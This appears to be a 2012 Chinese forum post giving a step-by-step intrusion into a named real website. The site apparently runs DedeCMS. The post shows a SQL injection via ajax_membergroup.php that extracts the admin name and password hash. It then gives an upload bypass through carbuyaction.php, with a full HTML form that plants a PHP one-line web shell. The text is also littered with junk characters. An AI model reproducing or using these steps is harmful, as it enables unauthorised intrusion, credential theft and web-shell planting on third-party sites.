①注入漏洞。
* _ S" B% f' c$ ^2 G3 S这站 http://www.political-security.com/
5 ]1 T' U/ E8 Q首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,/ u: Z) T3 Z; ?2 z
www.political-security.com/data/mysql_error_trace.inc 爆后台5 x$ ?8 e2 O" ^' o, q
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。- J! D- ^1 Z* A9 d! n, _
然后写上语句
+ F4 @2 N9 H# h2 J; S x查看管理员帐号
; k" ?2 G! L# E. U1 _http://www.political-security.co ... &membergroup=@`
! w, r0 o5 h& L3 a$ I9 I
$ B4 ~/ T7 X5 h) O* j+ L% s2 Kadmin ' U n) b0 }0 k+ z/ ]
; i* K( c2 x; o: i
查看管理员密码1 ^$ Q* B$ e) n+ g' u9 m# h4 ~3 y7 `
http://www.political-security.co ... &membergroup=@`
7 M: C& [" `1 A# M4 s) a
5 Y" M; C5 F, V5 s' t+ h& y8d29b1ef9f8c5a5af429# o) {4 t+ r# |3 g
* L8 Z3 P. O* E4 X查看管理员密码
+ h! S/ I6 m% j$ z
6 u7 L/ B+ b# v; d( e; O得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
: `0 G. Y" x% V* F A, F! R
2 C. q. x, L" Z, d/ J$ f8d2+ {: `; J8 k) P! J0 m
9b1ef9f8c5a5af42. U8 r U3 L3 q
9
0 R+ Y: Z/ Y+ d N6 p0 i
9 Z) X% R: }; W# [cmd5没解出来 只好测试第二个方法
7 @# j0 m8 l6 ?9 }. t9 V
: m O/ Y6 M4 S- w* |
7 e! B, }8 r6 D②上传漏洞:5 x* a0 u% B) a: I/ d, E
3 P+ q2 ^- E& t3 g% c6 k% j; u& Z只要登陆会员中心,然后访问页面链接
V; g" C, p3 E- _' N5 A1 n# f% E“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
, P7 z! c# w n: t7 n. N0 F6 F; A+ W2 O$ `7 P& u' h5 I
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
8 E9 b3 w8 H* v4 p; v( @7 Q8 i
: c, b% P; O3 V- @% Q于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
$ k: h* O0 Y5 i; H9 w, O4 x( X/ V' |% }! O* H% _5 {
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>$ i$ z- f) \9 E5 E% \9 T( Y
或者
3 l* C% q$ p5 n, Z1 F) ~. R2 B @即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对